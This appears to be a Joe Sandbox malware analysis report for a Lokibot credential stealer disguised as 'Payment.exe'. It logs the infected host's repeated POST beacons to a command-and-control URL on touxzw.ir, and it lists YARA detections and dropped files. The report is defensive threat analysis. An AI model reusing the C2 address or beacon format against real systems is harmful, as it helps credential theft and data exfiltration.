Feb 27, 2025 23:43:07.012559891 CET	828	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:43:06 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8fQIMfOk86Q0e6K6o7vKDifTL9Vd9ziqa%2FbmVBatm2q%2B3Y5ZVPJY4SOR%2FZyJKmpJThjOSzDC769TaBXfPvXwEy%2FDCc%2Fw1FCwt0M%2BDkm%2FOmpOpl9wV7bqKCEeSlg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb11eac284343-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1926&min_rtt=1926&rtt_var=963&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50060	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:43:08.174295902 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:43:08.180377007 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:43:08.907119989 CET	826	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:43:08 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0MZpMD%2FSeXZTadvisPWey8INDtST9HU54R9pkRW4zZY%2F%2BtezZUKHZuyZPJkOdFKNtJil%2BZX5QcT%2FtBO5o7LEwM1VaT%2BUJ3e8w1lPgjA8II80fvpbMdkbUTblnTg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb12aaefaefa3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1956&rtt_var=978&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50061	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:43:10.078201056 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:43:10.083395958 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:43:10.857620001 CET	848	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:43:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j6rzRvWNUCvK%2B16HrSyuPyhGe%2BJ4PcpMtXmoFw5Uujl7pnqgw8F5DLh%2F2n4kpxTGDKV3QMkcBfXhEpNbear6JbR5cLSyM%2FBds%2BzcOHu%2FE0e7wjVG0PHz22XHKe8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb136994ec326-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1773&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	50062	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:43:12.017047882 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:43:12.023349047 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:43:12.799716949 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:43:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bIJVFU0loeavJ%2FRn1DtqziRzwAPfHyhqze6iXx547Ou%2B7UD78i%2FLziif0nb87cLjJKcTURE216LITxtwRpYFtjQcbwf1FYPqUFGxOTkSOzhZIdMLvIV4uwLWFy0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb1429a6bc360-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1761&rtt_var=880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=139&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	50063	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:43:13.977494001 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:43:13.982660055 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:43:14.728152990 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:43:14 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PUVUElRCg1OER%2Bgt75PUAeRBr6RUWY0vAGqUekTYbdN02EHtfMFoJHXrrNw%2BcTuz0TzljU1YuUiU3sj92H0ZH26W59HYI3PShoRPa6B6REy4gpJufLl4qOzT238%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb14eee5378e1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1977&rtt_var=988&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	50064	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:43:15.916953087 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:43:15.922272921 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:43:16.641885996 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:43:16 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VuOnBS4vUo1XnlsvfjR74YOeyLxYMCvxH%2BQl%2FQhkZvPHQ0C0WvQvtavSmHBF7u56vrs19PUAwknyzLeCvtQ13IHWQ88bI2rwgo0uFGoSDe5xkDFkjsjsWpYwPI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb15afd52c420-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1655&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	50065	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:43:17.803793907 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:43:17.811981916 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:43:18.623796940 CET	843	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:43:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8F92c83CxWN%2FSuSMz3XjHMMprFhbT8cmx5nruDY7O8qT6vskLNlXMKziI%2FBzHrLtxrX6flpWzeaoJgZc%2BwRu6DZ2Wi6bZxHWN6WBQ8j1OarCca21lwpFpF23Mvg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb166fee94277-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2400&min_rtt=2400&rtt_var=1200&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	50066	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:43:19.821134090 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:43:19.826738119 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:43:20.626636982 CET	843	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:43:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQ3R5M7afP1bLHDVWUQhR2foRzEw%2Brw3H67MfKn1OGRSfe%2B9ffUS8vaFQ%2FZAZv56H3ATNyRYxqMdsbHnA69BwoxwQZJQnyY52cCUqrpuRwkREYZl82rgsQS6GTw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb1737ffbc35a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2066&min_rtt=2066&rtt_var=1033&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	17:41:15
Start date:	27/02/2025
Path:	C:\Users\user\Desktop\Payment.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment.exe"
Imagebase:	0x810000
File size:	984'576 bytes
MD5 hash:	F79E4DE7214575CD58E80093282F0FBB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:41:16
Start date:	27/02/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment.exe"
Imagebase:	0xc60000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.2981726781.000000000322A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut28E5.tmp

C:\Users\user\AppData\Local\Temp\springmaker

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
Payment.exe